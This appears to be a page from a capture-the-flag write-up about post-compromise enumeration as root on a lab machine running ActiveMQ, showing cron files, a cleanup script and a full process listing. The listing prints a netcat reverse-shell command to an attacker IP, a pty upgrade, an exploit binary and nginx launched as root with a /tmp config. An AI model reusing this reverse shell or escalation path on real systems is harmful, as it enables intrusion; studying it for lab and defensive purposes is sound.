Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.
Cron
root@broker:~# crontab -l
no crontab for root
root@broker:~# cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#??
root@broker:~# for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l; done
no crontab for root
no crontab for daemon
no crontab for bin
no crontab for sys
no crontab for sync
no crontab for games
no crontab for man
no crontab for lp
no crontab for mail
no crontab for news
no crontab for uucp
no crontab for proxy
no crontab for www-data
no crontab for backup
no crontab for list
no crontab for irc
no crontab for gnats
no crontab for nobody
no crontab for _apt
no crontab for systemd-network
no crontab for systemd-resolve
no crontab for messagebus
no crontab for systemd-timesync
no crontab for pollinate
no crontab for sshd
no crontab for syslog
no crontab for uuidd
no crontab for tcpdump
no crontab for tss
no crontab for landscape
no crontab for fwupd-refresh
no crontab for usbmux
no crontab for lxd
no crontab for activemq
no crontab for _laurel????
root@broker:/etc# cd cron.d
root@broker:/etc/cron.d# ll
total 20
drwxr-xr-x 2 root root 4096 Nov 7 12:49 ./
drwxr-xr-x 105 root root 4096 Nov 7 06:53 ../
-rw-r--r-- 1 root root 91 Nov 7 12:48 cleanup
-rw-r--r-- 1 root root 201 Jan 8 2022 e2scrub_all
-rw-r--r-- 1 root root 102 Mar 23 2022 .placeholder
root@broker:/etc/cron.d# cat cleanup
*/20 * * * * root /root/cleanup.sh
*/10 * * * * root /usr/bin/echo "" > /etc/ld.so.preloadFound it
cleanup.sh
root@broker:~# cat cleanup.sh
#!/bin/bash
# Use the find command to locate files and directories
# that are less than 20 minutes old and delete them
find /tmp -type f -mmin -20 -exec rm -f {} +
find /tmp -mindepth 1 -maxdepth 1 -type d -mmin -20 -exec rm -rf {} +
find /dev/shm -type f -mmin -20 -exec rm -f {} +
find /dev/shm -mindepth 1 -maxdepth 1 -type d -mmin -20 -exec rm -rf {} +
find /home/activemq -type f -not -name 'user.txt' -mmin -20 -exec rm -f {} +
find /home/activemq -mindepth 1 -maxdepth 1 -type d -mmin -20 -exec rm -rf {} +Smart way to restore a static system
Processes
root@broker:~# ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 100552 11396 ? Ss Dec12 0:04 /sbin/init
root 401 0.1 1.9 142672 78656 ? S<s Dec12 2:21 /lib/systemd/systemd-journald
root 438 0.0 0.6 289344 27096 ? SLsl Dec12 0:11 /sbin/multipathd -d -s
root 442 0.0 0.1 25732 6736 ? Ss Dec12 0:00 /lib/systemd/systemd-udevd
systemd+ 479 0.0 0.1 89356 6620 ? Ssl Dec12 0:06 /lib/systemd/systemd-timesyncd
root 480 0.0 0.2 51140 11816 ? Ss Dec12 0:00 /usr/bin/VGAuthService
root 481 0.1 0.2 316020 10108 ? Ssl Dec12 1:50 /usr/bin/vmtoolsd
root 482 0.1 0.0 85276 2668 ? S<sl Dec12 1:47 /sbin/auditd
_laurel 484 0.0 0.4 20516 16488 ? S< Dec12 1:20 /usr/local/sbin/laurel --config /etc/laurel/config.toml
systemd+ 498 0.0 0.2 16120 8176 ? Ss Dec12 0:03 /lib/systemd/systemd-networkd
systemd+ 529 0.0 0.3 26060 14052 ? Ss Dec12 0:17 /lib/systemd/systemd-resolved
root 630 0.0 0.1 101236 5940 ? Ssl Dec12 0:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 645 0.0 0.0 0 0 ? I< Dec12 0:00 [nfit]
message+ 742 0.0 0.1 8848 5192 ? Ss Dec12 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 746 0.0 0.0 82828 3936 ? Ssl Dec12 0:04 /usr/sbin/irqbalance --foreground
root 748 0.0 0.4 32684 19164 ? Ss Dec12 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 749 0.0 0.1 234504 6688 ? Ssl Dec12 0:00 /usr/libexec/polkitd --no-debug
syslog 750 0.0 0.1 222400 6212 ? Ssl Dec12 0:01 /usr/sbin/rsyslogd -n -iNONE
root 751 0.0 0.1 15528 7572 ? Ss Dec12 0:00 /lib/systemd/systemd-logind
root 753 0.0 0.3 392464 12792 ? Ssl Dec12 0:00 /usr/libexec/udisks2/udisksd
root 768 0.0 0.3 317956 12296 ? Ssl Dec12 0:00 /usr/sbin/ModemManager
root 910 0.0 0.0 6892 2988 ? Ss Dec12 0:00 /usr/sbin/cron -f -P
root 942 0.0 0.0 10292 984 ? Ss Dec12 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 944 0.0 0.1 11916 5544 ? S Dec12 1:25 nginx: worker process
www-data 945 0.0 0.1 11932 5560 ? S Dec12 1:09 nginx: worker process
root 950 0.0 0.2 15424 9320 ? Ss Dec12 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 955 0.0 0.0 6172 1064 tty1 Ss+ Dec12 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
activemq 969 0.6 12.1 3544380 488208 ? Sl Dec12 10:57 /usr/bin/java -Xms64M -Xmx1G -Djava.util.logging.config.file=logging.properties -Djava.security.auth.login.config=/opt/apache-activemq-5.15.15//conf/login.config -Dcom.sun.management.jmxremote -Djava.awt.headless=true -Djava.io.tmpdir=/opt/apache-activemq-5.15.15//tmp -Dactivemq.classpath=/opt/apache-activemq-5.15.15//conf:/opt/apache-activemq-5.15.15//../lib/: -Dactivemq.home=/opt/apache-activemq-5.15.15/ -Dactivemq.base=/opt/apache-activemq-5.15.15/ -Dactivemq.conf=/opt/apache-activemq-5.15.15//conf -Dactivemq.data=/opt/apache-activemq-5.15.15//data -jar /opt/apache-activemq-5.15.15//bin/activemq.jar start
root 2237 0.0 0.2 239612 8904 ? Ssl Dec13 0:00 /usr/libexec/upowerd
activemq 5512 0.0 0.0 7368 3504 ? S Dec13 0:00 /bin/bash -c mkfifo /tmp/osaj; nc 10.10.16.8 9999 0</tmp/osaj | /bin/sh >/tmp/osaj 2>&1; rm /tmp/osaj
activemq 5515 0.0 0.0 3532 2036 ? S Dec13 0:00 nc 10.10.16.8 9999
activemq 5516 0.0 0.0 2888 956 ? S Dec13 0:00 /bin/sh
activemq 5521 0.0 0.0 5784 1088 ? S Dec13 0:00 script /dev/null -c bash
activemq 5522 0.0 0.1 8700 5388 pts/0 Ss Dec13 0:00 bash
activemq 5666 0.0 0.2 17592 9308 pts/0 S+ Dec13 0:00 python3 -c import pty; pty.spawn("/bin/bash")
activemq 5667 0.0 0.1 8700 5464 pts/1 Ss Dec13 0:00 /bin/bash
activemq 22185 0.0 0.2 17056 9488 ? Ss Dec13 0:00 /lib/systemd/systemd --user
activemq 22186 0.0 0.0 103472 3648 ? S Dec13 0:00 (sd-pam)
activemq 22434 0.1 0.6 3115868 24912 pts/1 Sl+ Dec13 0:13 jar -t activemq.jar
root 22510 0.0 0.2 16920 10860 ? Ss Dec13 0:00 sshd: activemq [priv]
activemq 22569 0.0 0.2 17744 8624 ? S Dec13 0:00 sshd: activemq@pts/3
activemq 22570 0.0 0.1 8784 5752 pts/3 Ss Dec13 0:00 -bash
root 22620 0.0 0.6 385648 26396 ? Ssl Dec13 0:00 /usr/libexec/fwupd/fwupd
activemq 22701 0.0 0.0 2776 1540 pts/3 S Dec13 0:00 ./exploit-2 /usr/bin/newgrp
activemq 22702 0.0 0.0 2888 1012 pts/3 S Dec13 0:00 sh -c /usr/bin/newgrp
root 22703 0.0 0.0 6220 1080 pts/3 S Dec13 0:00 /usr/bin/newgrp
activemq 22704 0.0 0.1 8896 5752 pts/3 S+ Dec13 0:00 bash
root 22800 0.0 0.0 10008 888 ? Ss Dec13 0:00 nginx: master process /usr/sbin/nginx -c /tmp/nginx.conf
root 22801 0.0 0.0 10652 3580 ? S Dec13 0:00 nginx: worker process
root 22802 0.0 0.0 10652 3580 ? S Dec13 0:00 nginx: worker process
root 22803 0.0 0.0 10652 3580 ? S Dec13 0:00 nginx: worker process
root 22804 0.0 0.0 10652 3580 ? S Dec13 0:00 nginx: worker process
root 23047 0.0 0.0 10008 892 ? Ss 01:24 0:00 nginx: master process /usr/sbin/nginx -c /tmp/nginx.conf
root 23048 0.0 0.0 10800 3696 ? S 01:24 0:00 nginx: worker process
root 23049 0.0 0.0 10800 3696 ? S 01:24 0:00 nginx: worker process
root 23050 0.0 0.0 10800 3696 ? S 01:24 0:00 nginx: worker process
root 23051 0.0 0.0 10800 3696 ? S 01:24 0:00 nginx: worker process
root 23060 0.0 0.2 17188 11152 ? Ss 01:25 0:00 sshd: root@pts/4
root 23063 0.0 0.2 17060 9572 ? Ss 01:25 0:00 /lib/systemd/systemd --user
root 23064 0.0 0.0 103612 3692 ? S 01:25 0:00 (sd-pam)
root 23150 0.0 0.1 8652 5496 pts/4 Ss 01:25 0:00 -bash
root 23230 0.0 0.0 10332 3804 pts/4 R+ 01:34 0:00 ps -auxwww